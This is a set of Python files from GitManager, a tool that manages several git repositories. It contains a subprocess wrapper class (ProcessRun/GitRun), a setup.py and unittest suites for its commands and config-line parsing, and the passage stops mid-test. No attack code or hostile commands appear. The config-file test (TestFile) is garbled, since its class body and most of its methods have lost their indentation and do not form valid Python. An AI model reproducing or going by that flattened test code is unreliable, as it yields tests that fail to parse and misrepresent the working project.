    def pipe_stdout(self) -> bool:
        """ should we pipe stdout to the parent? """
        return self.__pipe_stdout

    @property
    def stdout(self) -> typing.Optional[typing.IO[bytes]]:
        """ the stdout handle of the process or None """
        # we need to run the process first
        if self.state == ProcessRunState.NEW:
            raise ProcessRunStateError('ProcessRun() is not running')

        # if we are not piping stdout to the parent, we captured it -- so
        # the Popen handle exposes it
        if not self.pipe_stdout:
            return self.__handle.stdout

        # else we return None
        else:
            return None

    @property
    def pipe_stderr(self) -> bool:
        """ should we pipe stderr to the parent? """
        return self.__pipe_stderr

    @property
    def stderr(self) -> typing.Optional[typing.IO[bytes]]:
        """ the stderr handle of the process or None """
        # we need to run the process first
        if self.state == ProcessRunState.NEW:
            raise ProcessRunStateError('ProcessRun() is not running')

        # BUGFIX (comment only): if we are NOT piping stderr to the
        # parent, we captured it and can return the handle
        if not self.pipe_stderr:
            return self.__handle.stderr

        # else we return None
        else:
            return None

    @property
    def pipe_stdin(self) -> bool:
        """ should we pipe stdin to the parent? """
        return self.__pipe_stdin

    @property
    def stdin(self) -> typing.Optional[typing.IO[bytes]]:
        """ the stdin handle of the process or None """
        # we need to run the process first
        if self.state == ProcessRunState.NEW:
            raise ProcessRunStateError('ProcessRun() is not running')

        # BUGFIX (comment only): if we are NOT piping stdin from the
        # parent, we created a pipe and can return the handle
        if not self.pipe_stdin:
            return self.__handle.stdin

        # else we return None
        else:
            return None

    @property
    def returncode(self) -> int:
        """ the returncode of this process (blocking) """
        # if we are not yet finished, wait
        if self.state != ProcessRunState.TERMINATED:
            self.wait()

        return self.__handle.returncode

    @property
    def success(self) -> bool:
        """ success of this process, i.e. if its returncode was 0 """
        return self.returncode == 0

    #
    # STATE
    #

    @property
    def state(self) -> ProcessRunState:
        """
        The current state of the process -- has it been started, finished,
        etc.

        :return: a ProcessRunState member (NEW, ACTIVE or TERMINATED)
        """
        # (BUGFIX: the docstring previously claimed the values were
        # 'ready'/'running'/'finished', which do not exist.)

        # we have not been started yet
        if not self.__started:
            return ProcessRunState.NEW

        # Poll to check if we have finished
        self.__handle.poll()

        # still running
        if self.__handle.returncode is None:
            return ProcessRunState.ACTIVE

        # else return finished
        else:
            return ProcessRunState.TERMINATED

    def run(self):
        """ Runs this process

        :raises ProcessRunStateError: if the process was already started
        """
        # check that we have not yet been started
        if self.state != ProcessRunState.NEW:
            raise ProcessRunStateError(
                'ProcessRun() was already started, can not run it again. ')

        # Set the output arguments correctly: None means "inherit from the
        # parent" (i.e. pipe through), subprocess.PIPE means "capture"
        stdout = None if self.pipe_stdout else subprocess.PIPE
        stderr = None if self.pipe_stderr else subprocess.PIPE
        stdin = None if self.pipe_stdin else subprocess.PIPE

        # We are now running
        self.__started = True

        # Make the arguments ready
        self.__handle = subprocess.Popen([self.exe] + self.args, cwd=self.cwd,
                                         stdout=stdout, stderr=stderr,
                                         stdin=stdin, env=self.environment)

    def wait(self, timeout: typing.Optional[int] = None):
        """ waits for this process to finish

        :param timeout: Optional timeout to wait for
        """
        # we are not yet running, so start it
        if self.state == ProcessRunState.NEW:
            self.run()

        # and wait for the process
        self.__handle.wait(timeout=timeout)

    def kill(self):
        """ kills this process

        :raises ProcessRunStateError: if the process is not running
        """
        # we can only kill a running process
        if self.state != ProcessRunState.ACTIVE:
            raise ProcessRunStateError('can only kill running process')

        self.__handle.kill()
class GitRun(ProcessRun):
    """ A ProcessRun that invokes the `git` executable. """

    def __init__(self, *args: str,
                 cwd: typing.Optional[str] = None, pipe_stdout: bool = False,
                 pipe_stderr: bool = False, pipe_stdin: bool = False,
                 environment: typing.Optional[dict] = None):
        """
        :param args: Arguments to the git call
        :param cwd: Working directory of the git call. Defaults to the
        current working directory
        :param pipe_stdout: should we pipe stdout to the parent?
        :param pipe_stderr: should we pipe stderr to the parent?
        :param pipe_stdin: should we pipe stdin from the parent?
        :param environment: The environment of this process or None if it
        should be inherited from the parent
        """
        # behaves exactly like a plain ProcessRun with the executable
        # fixed to "git"
        super().__init__("git", *args, cwd=cwd, pipe_stdout=pipe_stdout,
                         pipe_stderr=pipe_stderr, pipe_stdin=pipe_stdin,
                         environment=environment)
class ProcessRunStateError(Exception):
    """ Raised when a ProcessRun is used in an invalid state. """
    pass
--- FILE SEPARATOR ---
import os
from setuptools import setup, find_packages
def read(fname):
    """Return the contents of the file *fname* next to this script.

    :param fname: File name relative to the directory of this file.
    :return: The full file contents as a string.
    """
    # resolve relative to this file so setup works from any cwd; use a
    # context manager so the handle is closed even on error (the original
    # leaked the file object).
    # NOTE(review): this still uses the platform default encoding --
    # consider encoding='utf-8' if the README is known to be UTF-8.
    with open(os.path.join(os.path.dirname(__file__), fname)) as f:
        return f.read()
# distribution metadata: packages the GitManager modules and installs
# the `git-manager` entry script
setup(
    name="git_manager",
    version="0.2.0",
    url="https://github.com/tkw1536/GitManager",
    author="Tom Wiesing",
    author_email="tkw01536@gmail.com",
    packages=find_packages(),
    scripts=['git-manager'],
    description="Manages multiple git repositories",
    # the README doubles as the PyPI long description
    long_description=read('README.rst'),
    license="MIT",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Intended Audience :: Developers",
        "Topic :: Utilities",
    ]
)
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager import commands
from GitManager.utils import format
from GitManager.repo import description
class TestCommand(unittest.TestCase):
    """ Tests that the command line works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository.exists',
        side_effect=[True, False])
    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_repos(self, command_parse: unittest.mock.Mock,
                   format_TerminalLine: unittest.mock.Mock,
                   implementation_exists: unittest.mock.Mock):
        """ Tests that the list of repos works properly """

        line = format.TerminalLine()
        # two repositories: exists() answers True for the first and
        # False for the second (see side_effect above)
        repos = [
            description.RepositoryDescription(
                '/path/to/source', '/path/to/clone'),
            description.RepositoryDescription(
                '/path/to/other/source', '/path/to/other/clone')
        ]
        cmd = commands.Command(line, repos)

        # a LOCAL command only yields repositories that exist on disk
        with unittest.mock.patch('GitManager.commands.Command.LOCAL',
                                 True):
            self.assertEqual(cmd.repos, repos[0:1])

        # a non-LOCAL command yields every repository
        with unittest.mock.patch('GitManager.commands.Command.LOCAL',
                                 False):
            self.assertEqual(cmd.repos, repos)

    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_args(self, command_parse: unittest.mock.Mock,
                  format_TerminalLine: unittest.mock.Mock):
        """ Checks that the args property is implemented properly"""

        cmd = commands.Command(format.TerminalLine(), [], "1", "2", "3")

        # the raw arguments go through parse() and its result is exposed
        command_parse.assert_called_with("1", "2", "3")
        self.assertEqual(cmd.args, command_parse.return_value)

    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_run(self, command_parse: unittest.mock.Mock,
                 format_TerminalLine: unittest.mock.Mock):
        """ Tests that the run() method is not implemented. """

        cmd = commands.Command(format.TerminalLine(), [])

        # the base class leaves run() abstract
        with self.assertRaises(NotImplementedError):
            cmd.run(description.RepositoryDescription('/path/to/source',
                                                      '/path/to/clone'))

    @unittest.mock.patch('builtins.print')
    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_write(self, command_parse: unittest.mock.Mock,
                   format_TerminalLine: unittest.mock.Mock,
                   builtins_print: unittest.mock.Mock):
        """ Tests that the write function works properly. """

        cmd = commands.Command(format.TerminalLine(), [])
        cmd.write("Hello world")

        # the line is broken first, then the text is printed
        format_TerminalLine.return_value.linebreak.assert_called_with()
        builtins_print.assert_called_with("Hello world")

    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_write_with_counter(self, command_parse: unittest.mock.Mock,
                                format_TerminalLine: unittest.mock.Mock):
        """ Tests that the write_with_counter function works correctly"""

        # a wide terminal, so nothing is shortened
        format_TerminalLine.return_value.width = 100

        # eleven identical repositories
        repos = [
            description.RepositoryDescription(
                '/path/to/source', '/path/to/clone')
            for _ in range(11)
        ]
        cmd = commands.Command(format.TerminalLine(), repos)

        # pretend we are at the third repository (index 2)
        cmd._Command__idx = 2
        cmd.write_with_counter('SOME TEXT')

        format_TerminalLine.return_value.write \
            .assert_called_with("[03/11] SOME TEXT")

    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_write_path_with_counter(self,
                                     command_parse: unittest.mock.Mock,
                                     format_TerminalLine: unittest.mock.Mock):
        """ Tests that the write_path_with_counter function works
        correctly"""

        # a narrow terminal forces the path to be shortened
        format_TerminalLine.return_value.width = 21

        # eleven identical repositories
        repos = [
            description.RepositoryDescription(
                '/path/to/source', '/path/to/clone')
            for _ in range(11)
        ]
        cmd = commands.Command(format.TerminalLine(), repos)

        # pretend we are at the third repository (index 2)
        cmd._Command__idx = 2
        cmd.write_path_with_counter('/path/to/clone')

        format_TerminalLine.return_value.write \
            .assert_called_with("[03/11] /path/.../...")

    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.commands.Command.write_path_with_counter')
    @unittest.mock.patch('GitManager.commands.Command.run', return_value=True)
    @unittest.mock.patch('GitManager.commands.Command.parse')
    def test_call(self,
                  command_parse: unittest.mock.Mock,
                  command_run: unittest.mock.Mock,
                  command_write_path_with_counter: unittest.mock.Mock,
                  format_TerminalLine: unittest.mock.Mock):
        """ Tests that the call() function works correctly """

        format_TerminalLine.return_value.width = 21

        # nine repositories with distinct clone paths
        repos = [
            description.RepositoryDescription(
                '/path/to/source', '/path/to/clone/{}'.format(i))
            for i in range(1, 10)
        ]
        expected = [d.local.path for d in repos]

        cmd = commands.Command(format.TerminalLine(), repos)

        # a non-plain command prints each path before running it
        with unittest.mock.patch('GitManager.commands.Command.PLAIN',
                                 False):
            self.assertEqual(cmd(), len(expected))

            # each of the commands should have been called
            for (e, r) in zip(expected, repos):
                command_write_path_with_counter.assert_any_call(e)
                command_run.assert_any_call(r)

            # the line should have been cleaned afterwards
            format_TerminalLine.return_value.clean.assert_called_with()

        # reset all the mocks
        command_run.reset_mock()
        command_write_path_with_counter.reset_mock()
        format_TerminalLine.reset_mock()

        # a plain command runs everything without printing paths
        with unittest.mock.patch('GitManager.commands.Command.PLAIN',
                                 True):
            self.assertEqual(cmd(), len(expected))

            command_write_path_with_counter.assert_not_called()

            for r in repos:
                command_run.assert_any_call(r)

            format_TerminalLine.return_value.clean.assert_called_with()
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import fetch
from GitManager.repo import description
from GitManager.utils import format
class TestFetch(unittest.TestCase):
    """ Tests that the fetch command works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository')
    def test_run(self,
                 implementation_LocalRepository: unittest.mock.Mock):
        # the repository the command operates on
        repo = description.RepositoryDescription('/path/to/source',
                                                '/path/to/clone')
        line = format.TerminalLine()
        cmd = fetch.Fetch(line, [repo])

        # alias for the mocked local repository instance
        local = implementation_LocalRepository.return_value

        # a missing local repository can not be fetched
        local.exists.return_value = False
        self.assertFalse(cmd.run(repo))
        local.fetch.assert_not_called()

        implementation_LocalRepository.reset_mock()

        # an existing local repository gets fetched
        local.exists.return_value = True
        local.fetch.return_value = True
        self.assertTrue(cmd.run(repo))
        local.fetch.assert_called_with()
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import gc
from GitManager.repo import description
from GitManager.utils import format
class TestGC(unittest.TestCase):
    """ Tests that the gc command works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository')
    def test_run(self,
                 implementation_LocalRepository: unittest.mock.Mock):
        # the repository the command operates on
        repo = description.RepositoryDescription('/path/to/source',
                                                '/path/to/clone')
        line = format.TerminalLine()
        cmd = gc.GC(line, [repo])

        # alias for the mocked local repository instance
        local = implementation_LocalRepository.return_value

        # a missing local repository is not garbage collected
        local.exists.return_value = False
        self.assertFalse(cmd.run(repo))
        local.gc.assert_not_called()

        implementation_LocalRepository.reset_mock()

        # an existing local repository gets garbage collected
        local.exists.return_value = True
        local.gc.return_value = True
        self.assertTrue(cmd.run(repo))
        local.gc.assert_called_with()

        # extra command line flags are forwarded to gc
        implementation_LocalRepository.reset_mock()
        cmd = gc.GC(line, [repo], '--aggressive')
        local.exists.return_value = True
        local.gc.return_value = True
        self.assertTrue(cmd.run(repo))
        local.gc.assert_called_with('--aggressive')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import lister
from GitManager.repo import description
from GitManager.utils import format
class TestFetch(unittest.TestCase):
    """ Tests that the lister command works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository')
    @unittest.mock.patch('builtins.print')
    def test_run(self,
                 builtins_print: unittest.mock.Mock,
                 implementation_LocalRepository: unittest.mock.Mock):
        # the repository the command operates on
        repo = description.RepositoryDescription('/path/to/source',
                                                '/path/to/clone')
        line = format.TerminalLine()
        cmd = lister.LsLocal(line, [repo])

        # alias for the mocked local repository instance
        local = implementation_LocalRepository.return_value

        # a missing local repository prints nothing but still succeeds
        local.exists.return_value = False
        self.assertTrue(cmd.run(repo))
        builtins_print.assert_not_called()

        builtins_print.reset_mock()
        implementation_LocalRepository.reset_mock()

        # an existing local repository has its path printed
        local.exists.return_value = True
        local.path = "/path/to/clone"
        self.assertTrue(cmd.run(repo))
        builtins_print.assert_called_with('/path/to/clone')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import state
from GitManager.repo import description
from GitManager.utils import format
from GitManager.repo import implementation
class TestReconfigure(unittest.TestCase):
    """ Tests that the reconfigure command works properly """
    # TODO: no behaviour is covered yet; tests still need to be written
    pass
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import setup as s
from GitManager.repo import description
from GitManager.utils import format
class TestFetch(unittest.TestCase):
    """ Tests that the setup command works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository')
    @unittest.mock.patch(
        'GitManager.repo.implementation.RemoteRepository')
    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    def test_run(self,
                 format_TerminalLine: unittest.mock.Mock,
                 implementation_RemoteRepository: unittest.mock.Mock,
                 implementation_LocalRepository: unittest.mock.Mock):
        # the repository the command operates on
        repo = description.RepositoryDescription('/path/to/source',
                                                '/path/to/clone')
        line = format.TerminalLine()
        cmd = s.Setup(line, [repo])

        # aliases for the mocked repository instances
        local = implementation_LocalRepository.return_value
        remote = implementation_RemoteRepository.return_value

        # an already existing clone is left untouched
        local.exists.return_value = True
        self.assertTrue(cmd.run(repo))
        remote.clone.assert_not_called()

        format_TerminalLine.reset_mock()
        implementation_LocalRepository.reset_mock()
        implementation_RemoteRepository.reset_mock()

        # a missing clone is created from the remote
        local.exists.return_value = False
        remote.clone.return_value = True
        self.assertTrue(cmd.run(repo))
        format_TerminalLine.return_value.linebreak.assert_called_with()
        remote.clone.assert_called_with(repo.local)
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import state
from GitManager.repo import description
from GitManager.utils import format
from GitManager.repo import implementation
class TestState(unittest.TestCase):
    """ Tests that the state command works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository')
    @unittest.mock.patch(
        'builtins.print')
    def test_run(self,
                 builtins_print: unittest.mock.Mock,
                 implementation_LocalRepository: unittest.mock.Mock):
        """ Exercises State.run() for every RemoteStatus outcome, with
        both the --no-update and the --update flag. """
        # create a repository
        repo = description.RepositoryDescription('/path/to/source',
                                                '/path/to/clone')
        # create a line
        line = format.TerminalLine()
        # and a command instance
        cmd = state.State(line, [repo], "--no-update")
        # if we are up-to-date, nothing should have been printed
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remote_status \
            .return_value = implementation.RemoteStatus.UP_TO_DATE
        self.assertTrue(cmd.run(repo))
        # with --no-update, remote_status is queried without updating (False)
        implementation_LocalRepository.return_value.remote_status \
            .assert_called_with(False)
        builtins_print.assert_not_called()
        # reset the mock
        implementation_LocalRepository.reset_mock()
        builtins_print.reset_mock()
        # create another command instance
        cmd = state.State(line, [repo], "--update")
        # if the local repository does not exist, run() fails
        implementation_LocalRepository.return_value.exists.return_value = False
        self.assertFalse(cmd.run(repo))
        # reset the mock
        implementation_LocalRepository.reset_mock()
        builtins_print.reset_mock()
        # if we are up-to-date, nothing should have been printed
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remote_status \
            .return_value = implementation.RemoteStatus.UP_TO_DATE
        self.assertTrue(cmd.run(repo))
        # with --update, remote_status is queried with updating (True)
        implementation_LocalRepository.return_value.remote_status\
            .assert_called_with(True)
        builtins_print.assert_not_called()
        # reset the mock
        implementation_LocalRepository.reset_mock()
        builtins_print.reset_mock()
        # upstream newer: run() fails and a pull is suggested in yellow
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remote_status \
            .return_value = implementation.RemoteStatus.REMOTE_NEWER
        self.assertFalse(cmd.run(repo))
        implementation_LocalRepository.return_value.remote_status \
            .assert_called_with(True)
        builtins_print.assert_called_with(
            format.Format.yellow('Upstream is ahead of your branch, '
                                 'pull required. '))
        # reset the mock
        implementation_LocalRepository.reset_mock()
        builtins_print.reset_mock()
        # local newer: run() fails and a push is suggested in green
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remote_status \
            .return_value = implementation.RemoteStatus.LOCAL_NEWER
        self.assertFalse(cmd.run(repo))
        implementation_LocalRepository.return_value.remote_status \
            .assert_called_with(True)
        builtins_print.assert_called_with(
            format.Format.green('Your branch is ahead of upstream, '
                                'push required.'))
        # reset the mock
        implementation_LocalRepository.reset_mock()
        builtins_print.reset_mock()
        # divergence: run() fails and a merge/rebase is suggested in red
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remote_status \
            .return_value = implementation.RemoteStatus.DIVERGENCE
        self.assertFalse(cmd.run(repo))
        implementation_LocalRepository.return_value.remote_status \
            .assert_called_with(True)
        builtins_print.assert_called_with(
            format.Format.red('Your branch and upstream have diverged, '
                              'merge or rebase required. '))
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import status
from GitManager.repo import description
from GitManager.utils import format
class TestStatus(unittest.TestCase):
    """ Tests that the status command works properly """

    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository')
    @unittest.mock.patch('GitManager.utils.format.TerminalLine')
    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_run(self,
                 run_gitrun: unittest.mock.Mock,
                 format_TerminalLine: unittest.mock.Mock,
                 implementation_LocalRepository: unittest.mock.Mock):
        # the repository the command operates on
        repo = description.RepositoryDescription('/path/to/source',
                                                '/path/to/clone')
        line = format.TerminalLine()
        cmd = status.Status(line, [repo])

        # alias for the mocked local repository instance
        local = implementation_LocalRepository.return_value

        # a missing local repository does nothing
        local.exists.return_value = False
        local.path.return_value = \
            '/path/to/clone'
        self.assertFalse(cmd.run(repo))
        implementation_LocalRepository.exists.assert_not_called()

        format_TerminalLine.reset_mock()
        implementation_LocalRepository.reset_mock()
        run_gitrun.reset_mock()

        # an existing but clean repository triggers no `git status`
        local.exists.return_value = True
        local.path.return_value = \
            '/path/to/clone'
        local.local_status.return_value \
            = ''
        self.assertTrue(cmd.run(repo))
        run_gitrun.assert_not_called()

        format_TerminalLine.reset_mock()
        implementation_LocalRepository.reset_mock()
        run_gitrun.reset_mock()

        # a dirty repository triggers a full `git status` run
        local.exists.return_value = True
        local.path = \
            '/path/to/clone'
        local.local_status.return_value \
            = 'M some/file'
        self.assertFalse(cmd.run(repo))
        format_TerminalLine.return_value.linebreak.assert_called_with()
        run_gitrun.assert_called_with('status', cwd='/path/to/clone',
                                      pipe_stdout=True)
        run_gitrun.return_value.wait.assert_called_with()
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.config import file, line
class TestFile(unittest.TestCase):
""" Tests that File() can be correctly read and parsed """
def test_read(self):
    """ Tests that the locals are yielded properly """
    # read the lines from the configuration file
    fn = file.File("/path/to/config")
    # raw configuration text served by the mocked open()
    fake_lines = "\n".join([
        "# Top level line with a comment",
        " hello world ",
        "> something ",
        " hello world ",
        ">> sub ",
        " hello world ",
        "> else ",
        " hello world"
    ]).encode("utf-8")
    # NOTE(review): passing the result of mock_open(...) as new_callable
    # is unusual -- the idiomatic form is
    # patch('builtins.open', unittest.mock.mock_open(read_data=...)).
    # Verify that read_data actually reaches fn.read() here.
    with unittest.mock.patch('builtins.open',
                             new_callable=unittest.mock.mock_open(
                                 read_data=fake_lines)) \
            as _:
        # read all the lines
        fn.read()
    # the parsed line objects fn.read() is expected to produce
    expected = [
        line.NOPLine("# Top level line with a comment"),
        line.RepoLine(' ', 'hello', ' ', 'world', ' '),
        line.BaseLine('', 1, ' ', 'something', ' '),
        line.RepoLine(' ', 'hello', ' ', 'world', ' '),
        line.BaseLine('', 2, ' ', 'sub', ' '),
        line.RepoLine(' ', 'hello', ' ', 'world', ' '),
        line.BaseLine('', 1, ' ', 'else', ' '),
        line.RepoLine(' ', 'hello', ' ', 'world', ' ')
    ]
    # NOTE(review): zip() stops at the shorter sequence -- if fn.lines
    # comes back empty this loop asserts nothing; consider also
    # asserting the number of parsed lines.
    for (actual, intended) in zip(fn.lines, expected):
        self.assertEqual(actual, intended, "line parsed properly")
@unittest.mock.patch('builtins.open')
def test_write(self, builtins_open: unittest.mock.Mock):
""" Tests that writing lines works properly """
# create a config file instance
fn = file.File("/path/to/config")
# setup the lines properly
fn.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
fake_lines = [
"# Top level line with a comment",
" hello world ",
"> something ",
" hello world ",
">> sub ",
" hello world ",
"> else ",
" hello world "
]
# do the writing
fn.write()
# check that each of the lines has been written
for l in fake_lines:
builtins_open.return_value.__enter__.return_value.write. \
assert_any_call("{}\n".format(l))
@unittest.mock.patch('os.path.isfile', return_value=False)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_find(self, os_path_expanduser: unittest.mock.Mock,
os_path_isfile: unittest.mock.Mock):
""" Tests that the find() method works properly """
# no environment variables
with unittest.mock.patch.dict('os.environ', {}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call(
'/path/to/home/.config/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False]
self.assertEqual(file.File.find(),
'/path/to/home/.config/.gitmanager/config',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the second file if it exists")
# reset the mock completly
os_path_isfile.reset_mock()
os_path_isfile.side_effect = None
os_path_isfile.return_value = False
# only $GIT_MANAGER_CONFIG
with unittest.mock.patch.dict('os.environ', {
"GIT_MANAGER_CONFIG": "/path/to/config.file"
}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call('/path/to/config.file')
os_path_isfile.assert_any_call(
'/path/to/home/.config/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False, False]
self.assertEqual(file.File.find(),
'/path/to/config.file',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True, False]
self.assertEqual(file.File.find(),
'/path/to/home/.config/.gitmanager/config',
"Finding the second file if it exists")
# take the third alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the third file if it exists")
os_path_isfile.reset_mock()
os_path_isfile.side_effect = None
os_path_isfile.return_value = False
# only XDG_CONFIG_HOME
with unittest.mock.patch.dict('os.environ', {
"XDG_CONFIG_HOME": "/path/to/xdg"
}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call(
'/path/to/xdg/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False]
self.assertEqual(file.File.find(),
'/path/to/xdg/.gitmanager/config',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the second file if it exists")
# reset the mock completely
os_path_isfile.reset_mock()
os_path_isfile.side_effect = None
os_path_isfile.return_value = False
# both
with unittest.mock.patch.dict('os.environ', {
"GIT_MANAGER_CONFIG": "/path/to/config.file",
"XDG_CONFIG_HOME": "/path/to/xdg"
}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call('/path/to/config.file')
os_path_isfile.assert_any_call(
'/path/to/xdg/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False, False]
self.assertEqual(file.File.find(),
'/path/to/config.file',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True, False]
self.assertEqual(file.File.find(),
'/path/to/xdg/.gitmanager/config',
"Finding the second file if it exists")
# take the third alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the third file if it exists")
--- FILE SEPARATOR ---
import unittest
from GitManager.config import line
class TestConfigLine(unittest.TestCase):
    """ Tests that ConfigLines can be correctly parsed"""

    def test_abstract(self):
        """ Tests that the write() method is abstract """
        # the base class deliberately leaves write() unimplemented
        with self.assertRaises(NotImplementedError):
            line.ConfigLine.write(None)

    def test_parse_RootLine(self):
        """ Tests that RootLines can be properly parsed """
        cases = [
            ('##root', line.RootLine('', '', 'root', ''),
             'parsing root directive'),
            ('\t ## /folder ', line.RootLine('\t ', ' ', '/folder', ' '),
             'parsing comments with tabs'),
        ]
        for (raw, expected, message) in cases:
            self.assertEqual(line.ConfigLine.parse(raw), expected, message)

    def test_parse_NOPLine(self):
        """ Tests that NOPLines can be correctly parsed """
        # a NOPLine keeps the raw content verbatim
        cases = [
            ('# hello world', 'parsing comments'),
            ('# >>> a b', 'parsing commented out RepoLine'),
            ('\t # hello world', 'parsing comments with spaces'),
            ('', 'parsing empty line'),
            ('\t\n ', 'parsing line with only spaces'),
        ]
        for (raw, message) in cases:
            self.assertEqual(line.ConfigLine.parse(raw), line.NOPLine(raw),
                             message)

    def test_parse_BaseLine(self):
        """ Tests that BaseLines can be correctly parsed """
        cases = [
            ('> hello', line.BaseLine('', 1, ' ', 'hello', ''),
             'parsing minimal BaseLine'),
            ('>>>> hello', line.BaseLine('', 4, ' ', 'hello', ''),
             'parsing minimal BaseLine with more indent'),
            ('> hello ', line.BaseLine('', 1, ' ', 'hello', ' '),
             'parsing complete BaseLine with minimal spacing'),
            ('>>>> hello ', line.BaseLine('', 4, ' ', 'hello', ' '),
             'parsing complete BaseLine with minimal spacing '
             'and more indent'),
            ('\t>>>>\t\thello\t ',
             line.BaseLine('\t', 4, '\t\t', 'hello', '\t '),
             'parsing complete BaseLine with spacing '
             'and more indent'),
        ]
        for (raw, expected, message) in cases:
            self.assertEqual(line.ConfigLine.parse(raw), expected, message)

    def test_parse_RepoLine(self):
        """ Tests that RepoLines can be correctly parsed """
        cases = [
            ('a', line.RepoLine('', 'a', '', '', ''),
             'parsing minimal RepoLine'),
            ('a b', line.RepoLine('', 'a', ' ', 'b', ''),
             'parsing minimal but complete RepoLine'),
            ('\ta\t\tb\t\t\t',
             line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t'),
             'parsing RepoLine with spacing'),
        ]
        for (raw, expected, message) in cases:
            self.assertEqual(line.ConfigLine.parse(raw), expected, message)

    def test_parse_fail(self):
        """ Tests that invalid lines can not be parsed """
        invalid = [
            # three items can not be parsed
            "a b c",
            # Comments at the end of the line are not allowed
            "hello world #things",
            ">> hello world #things",
        ]
        for raw in invalid:
            with self.assertRaises(ValueError):
                line.ConfigLine.parse(raw)
class TestRootLine(unittest.TestCase):
    """ Tests that RootLine class works properly """

    def test_eq(self):
        """ Checks that equality between RootLines works properly """
        # identically-constructed RootLines always compare equal
        for args in [('', '', '/root', ''), ('\t ', '', 'folder', '')]:
            self.assertEqual(line.RootLine(*args), line.RootLine(*args),
                             'equality of root lines')

    def test_indent(self):
        """ Tests that the indent function works properly """
        cases = [
            (('\t ', '', 'folder', ''), '\t '),
            (('', '', '/root', ''), ''),
        ]
        for (args, expected) in cases:
            self.assertEqual(line.RootLine(*args).indent, expected,
                             'indent of root line')

    def test_write(self):
        """ Tests that writing RootLines works properly """
        cases = [
            (('', '', '/root', ''), '##/root'),
            (('\t ', '', 'folder', ''), '\t ##folder'),
        ]
        for (args, expected) in cases:
            self.assertEqual(line.RootLine(*args).write(), expected,
